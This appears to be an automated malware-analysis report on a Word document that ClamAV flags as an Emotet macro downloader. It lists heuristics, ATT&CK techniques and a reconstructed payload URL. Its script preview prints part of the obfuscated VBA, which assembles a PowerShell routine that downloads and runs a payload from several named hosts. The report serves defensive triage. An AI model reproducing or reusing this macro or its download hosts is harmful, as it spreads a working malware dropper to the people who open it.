MALICIOUS
244
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample contains a critical OLE_VBA_SHELL heuristic firing, indicating the presence of a Shell() call within the VBA macros. The ClamAV detection also explicitly identifies it as 'Doc.Macro.Emotet-6374344-0'. The VBA script attempts to download and execute a payload from the reconstructed URL 'http://remont-spb.ru/UpamuKMpu'. This behavior is characteristic of Emotet malware, which often uses macro-enabled documents to deliver its initial payload.
Heuristics 8
-
ClamAV: Doc.Macro.Emotet-6374344-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.Emotet-6374344-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://pJx+pJxmonpJx+p In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 50907 bytes |
SHA-256: dffe52bcfd8d947f58d7f691339e48c931342a6a0549db1979d1d6c968bfb220 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 38 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "ffnDuzPVK"
Function EZjspdfrI()
ljFzMzROL = "" + ozmKuCR + Mid("Cjdzbbject rapJx+pJxndpJx+pJxompJx+pJx;rRpJx+pJxisV+isVQpJx+pJxbcpJx+pJx'+'d = 684http:pJx+pJx//pJx+pJxremopJx+pJxnpJx+pJxt-bpJx+'+'pJxrpJx+pJxitv.ru/UpJx+pJxamuKMpu/,hisV+isVtpJx+YqcGzlU3CmicnNL", 6, 175) + BhJNQpJ + fJsCMEw
DROWjU = "" + BNcUVzz + Mid("2SiYmf7n rRQb'+'cd){isV+isVpJx+pJxtry{pJx+pJxrpJ'+'x+pJxRQpJx+isVRXfrEs3YYo7m5liqHqvbw8CJAGOP9pBO", 8, 58) + JCiHmCG + NKXvJwY
DCwbhtMw = "" + arjwsPK + Mid("t499wkumGwusAOjwX8ZopJx+pJxreoinpJx+pJxtpJp9OpFHV3GdDw", 20, 23) + rloZhHD + JBfIzcY
moQoK = "" + MKFIOwP + Mid("jo6faTkpJx+pJxebClipJx+pJisV+isVxent;isV+w76jGSQaR89", 8, 34) + mQfFsXS + VuIfGzz
GnKiWjKPi = "" + CqNbMHP + Mid("OERQrhIilpJxtp://remont-spJx+pJxhpJx+pJxlapJx+pJxngovpJx+pJx.rpJx+p'+'JxupJx+'+'pJx/Q/,ht'+'tp://pJx+pJx'+'www.lpJ'+'x+pJxepJxisV+isV+pJx'+'dppJx+pJxisV+isVublic'+'idad.pJx+pzDQSFQKwIV2DSN0QUZurOIs7FT7", 10, 165) + HfUzrlp + mTckiIw
ihGuaRwoD = "" + RinpoFc + Mid("R8GbIm0uCBch(pJx+pJisV+isVxrpJx+pJxRQpJ'+'x+pJxabpJx+ZWSKK", 11, 43) + jqquPrP + wiuhVEi
HwdIb = "" + zsTtVai + Mid("rkoHsSnCPEc+isVpJxfrapJx+pJxnc.DownlpJx+pJxopJx+pJxadFile(pJx+pJxrRQabpJx+pJxc.ToStripIM9j2L", 12, 75) + YpRtjkr + AwfmidS
zQbDSjBWU = "" + NcjIFom + Mid("EUELPV& ( BwbsHelLid[1mPf4Bo2kTU1G", 6, 17) + JkiNDCR + EKmYfmi
qOufJNvhzV = "" + DaXdZFa + Mid("QiLGAp8z]48),[chAr]36-cRePLACe 'isV',[chAr]39) ) rwOcbummJisUP1HOtnJw6ktl", 9, 42) + PPhlLFH + jpTzXFc
rmEIpKBF = "" + BBMYikc + Mid("bkwjvd3fjKJ9PlAC'+'isV+i'+'sVe ([CHaisV+isVr]114+[CHar]82+[CHar]81),[CHar]36) ) isV) -REp'+'LAce isVBwbisV,[cHar]36 -REpLAce is'+'VpJxisV,[cHar]39))') -cRePLACe ([chAr]78+[chAr]66+[chArJoFOikr8dzSI20", 14, 175) + HIjaqmd + SGbdaLH
XzpfGADzv = "" + mwWsPLB + Mid("JaPMjHv8CKKZRisVr'+'RQnsadasd = pJx+pJxnpJx+pJxepJx+pJxwp'+'J'+'x+pJx-opJx+pJxG7HOXJKaSIjOp", 14, 65) + IfUbiJr + aEbvEoQ
wOzWGzNLv = "" + HhwwLcn + Mid("5MuiLJx+pJxExceptionpJx+pJx.is'+'V+isVMpJx+pJxesspJx+pJxage;}}pJx'+') -CREplACE isV+isVpJxotKpKvCWzEHW", 6, 86) + ZlTdrIY + cGSACsT
BdSWVV = "" + wIcoGFl + Mid("uEadlVCIiHIVlOKJxcom/jtpJx+pJxvspJx+pJxZpJx+pJxO/isV+isV,http://pJx+pJxmonpJx+p'+'JxipJx+pJxtWVppPlnjihPOZiu", 16, 78) + NKjRitj + wozbKGX
iCzrBu = "" + XNlNPzQ + Mid("LaRNVeRbosepreFEr'+'ence)[1,3]+isVxisV-jOiNisVisV)( ((isoMBXdoV0ulr", 6, 51) + GKTQvPE + MwnqWdz
tLXqjow = "" + qwrZDCY + Mid("qZVknQ684pJx,[CHar]39 -CREplACE([CHar]99+[CHar]100+[CHar]119),[CisV+isVHaUw2F", 7, 67) + GNzKVHX + XkNdLcz
wKwvsN = "" + wwZzWIP + Mid("zNf2T0ptirHaG4pzuJt Sy'+'spJx+pJ'+'xtem.pJx+pJxNetpJx+pJx.WkFNNG7t", 19, 41) + KBSjojW + wzaokhs
HUUwmE = "" + DNGrssC + Mid("D3zWpJxcpJx+pJx pJx+pJisV+isVxiisV+isVj0VfLUhMVD", 5, 34) + rrFUpKT + CwrYwLh
tlTiCzM = "" + itpAlXm + Mid("maVFlC88KFcbOGnIkjrsVcfGv3", 20, 3) + CADzNdj + ntiajHY
vsWGhFWnX = "" + izZJJnB + Mid("lj0nn &((GET-vArIaBLE '*mDr*').naMe[3,11,2]-joIN'') ( (('.( ([StriNg]NB0VPIi9hAwPfOh", 6, 68) + KLQrAPd + UKvoodQ
cMWppEwavrn = "" + AazlDSY + Mid("t9YZFpIq3rtWx+pJxepJx'+'+pJxlipJx+pJxgente.com.pJx+pJx'+'arpJx+pJx/gkNupJx+pJxNKpfZ2PKQf4", 13, 69) + wpHXFwu + jjBmhcM
wCjbTi = "" + rDawhmP + Mid("jE4dZOOE9nJx+isV+isVpisV+isVJxnpJx+pJxgpJolCb8", 11, 31) + IbNnEjF + lhJiXfj
niNccTXs = "" + MivZFli + Mid("m0w9Si5i5wfA8r]92-REP34H3OZNDiJJvHPd42ImXFd", 14, 8) + GfHJVTw + QjMdoEl
MlSVZZwcs = "" + mzavEKG + Mid("4vrn9aJx+pJxlpJx+pJxYKpJx'+'+pJx/,httpJx+pJxisV+isVppJx+pJx:pJx+pJx//edavpJx+pJxsppJx+pJxb.pJx+pJxru/ppJx+pJxupJx+pJxtsitepJx+pJxmpJx+pJxshe'+'pJx+pJxre/TxpJx+pJxKvj/pJisV+isVx+pJ'+'x68pJx+p'+'Jx4.cwPqP91HD6HIwYfBj", 7, 191) + zWBRdjE + zHZoNXr
uSntEj = "" + Dtzbirf + Mid("kwqFwu3iZGTFp'+'Jx+pJxSplit(684,684);pJ'+'x+pJxrRpJx+pJxQkapJx+pJxrpJx+pJxapaspisV+isV'HdfQr9jZsz", 13, 75) + OMDzVcL + wYZzisn
DkmmzlRYS = "" + plpAOvO + Mid("buQ+'Jx+pis
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.